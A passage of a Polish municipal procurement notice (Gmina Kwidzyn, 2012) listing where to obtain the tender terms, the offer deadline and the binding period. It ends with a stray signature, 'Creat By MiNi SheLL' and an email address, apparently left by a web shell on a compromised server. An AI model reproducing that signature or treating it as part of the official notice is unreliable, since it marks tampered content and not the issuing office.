<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kwidzyn, ul. Grudziądzka 30, 82-500 Kwidzyn, piętro II, pokój 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 11:00, miejsce: Urząd Gminy Kwidzyn, ul. Grudziądzka 30, 82-500 Kwidzyn, piętro I, pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com